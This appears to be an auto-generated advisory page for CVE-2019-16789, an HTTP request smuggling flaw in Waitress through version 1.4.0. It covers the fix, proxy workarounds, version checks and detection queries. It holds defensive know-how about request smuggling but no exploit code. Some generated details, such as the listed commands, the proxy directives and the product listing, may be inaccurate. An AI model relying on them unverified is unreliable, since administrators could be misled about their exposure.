CVE-2019-16789 – CVE-2019-16789 is an HTTP request smuggling vul... (How to Fix)

Q: What is the severity of CVE-2019-16789?

CVE-2019-16789 has a CVSS score of 7.1 (HIGH). CVE-2019-16789 is an HTTP request smuggling vulnerability in Waitress web server versions through 1.4.0. Attackers can send specially crafted requests with invalid whitespace in Transfer-Encoding headers that bypass front-end proxies and get parsed differently by Waitress, potentially leading to request splitting. This affects any deployment using Waitress behind a proxy server with HTTP pipelining enabled.

📋 TL;DR

CVE-2019-16789 is an HTTP request smuggling vulnerability in Waitress web server versions through 1.4.0. Attackers can send specially crafted requests with invalid whitespace in Transfer-Encoding headers that bypass front-end proxies and get parsed differently by Waitress, potentially leading to request splitting. This affects any deployment using Waitress behind a proxy server with HTTP pipelining enabled.

💻 Affected Systems

Products:

Waitress

Versions: All versions through 1.4.0

Operating Systems: All platforms running Waitress

Default Config Vulnerable: ⚠️ Yes

Notes: Requires Waitress behind a proxy server with HTTP pipelining enabled; standalone Waitress deployments are not vulnerable

📦 What is this software?

Communications Cloud Native Core Network Function Cloud Native Environment by Oracle

View all CVEs affecting Communications Cloud Native Core Network Function Cloud Native Environment →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Cache poisoning leading to credential theft, session hijacking, or injection of malicious content to other users

🟠

Likely Case

Information disclosure through request splitting, potential for cache poisoning in vulnerable configurations

🟢

If Mitigated

Limited impact if proper proxy validation and request sanitization are in place

🌐 Internet-Facing: HIGH

🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ⚠️ Yes

Complexity: MEDIUM

Exploitation requires specific proxy configuration and knowledge of HTTP request smuggling techniques

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Waitress 1.4.1 and later

Vendor Advisory: https://docs.pylonsproject.org/projects/waitress/en/latest/#security-fixes

Restart Required: Yes

Instructions:

1. Upgrade Waitress to version 1.4.1 or later using pip: 'pip install waitress>=1.4.1' 2. Restart all Waitress services 3. Verify the upgrade with 'waitress-serve --version'

🔧 Temporary Workarounds

Disable HTTP Pipelining

all

Configure front-end proxy servers to disable HTTP pipelining to Waitress backend

# For nginx: proxy_http_version 1.0;
# For Apache: SetEnv proxy-nokeepalive 1

Strict Header Validation

linux

Configure proxy servers to reject requests with invalid whitespace in Transfer-Encoding headers

# Example nginx location block: if ($http_transfer_encoding ~* "[\t\n\r\f\v]") { return 400; }

🧯 If You Can't Patch

Deploy a WAF or reverse proxy with strict HTTP header validation in front of Waitress
Monitor for unusual HTTP request patterns and implement rate limiting

🔍 How to Verify

Check if Vulnerable:

Check Waitress version: 'waitress-serve --version' or 'pip show waitress' - if version is 1.4.0 or earlier, system is vulnerable

Check Version:

waitress-serve --version || python -c "import waitress; print(waitress.__version__)"

Verify Fix Applied:

Verify version is 1.4.1 or later and test with crafted requests containing whitespace in Transfer-Encoding headers

📡 Detection & Monitoring

Log Indicators:

Multiple requests from single connection with malformed Transfer-Encoding headers
Unexpected 400/500 errors from Waitress with unusual header patterns

Network Indicators:

HTTP requests with whitespace characters (\t, \n, \r, \f, \v) in Transfer-Encoding headers
Request splitting patterns in HTTP traffic

SIEM Query:

source="waitress.log" AND ("Transfer-Encoding" AND ("\t" OR "\n" OR "\r" OR "\f" OR "\v"))

📊 Metadata

CVE ID: CVE-2019-16789

CVSS v3 Score: 7.1 (HIGH)

CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:H/A:N

CWE: CWE-444

Published: December 26, 2019

Last Updated: November 21, 2024

🔗 References

https://access.redhat.com/errata/RHSA-2020:0720 Third Party Advisory
https://docs.pylonsproject.org/projects/waitress/en/latest/#security-fixes Release Notes,Vendor Advisory
https://github.com/Pylons/waitress/commit/11d9e138125ad46e951027184b13242a3c1de017 Patch,Third Party Advisory
https://github.com/github/advisory-review/pull/14604 Broken Link,Third Party Advisory
https://lists.debian.org/debian-lts-announce/2022/05/msg00011.html Mailing List,Third Party Advisory
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GVDHR2DNKCNQ7YQXISJ45NT4IQDX3LJ7/
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LYEOTGWJZVKPRXX2HBNVIYWCX73QYPM5/
https://www.oracle.com/security-alerts/cpuapr2022.html Patch,Third Party Advisory
https://access.redhat.com/errata/RHSA-2020:0720 Third Party Advisory
https://docs.pylonsproject.org/projects/waitress/en/latest/#security-fixes Release Notes,Vendor Advisory
https://github.com/Pylons/waitress/commit/11d9e138125ad46e951027184b13242a3c1de017 Patch,Third Party Advisory
https://github.com/github/advisory-review/pull/14604 Broken Link,Third Party Advisory
https://lists.debian.org/debian-lts-announce/2022/05/msg00011.html Mailing List,Third Party Advisory
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GVDHR2DNKCNQ7YQXISJ45NT4IQDX3LJ7/
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LYEOTGWJZVKPRXX2HBNVIYWCX73QYPM5/
https://www.oracle.com/security-alerts/cpuapr2022.html Patch,Third Party Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2019-16789, you might also want to check these: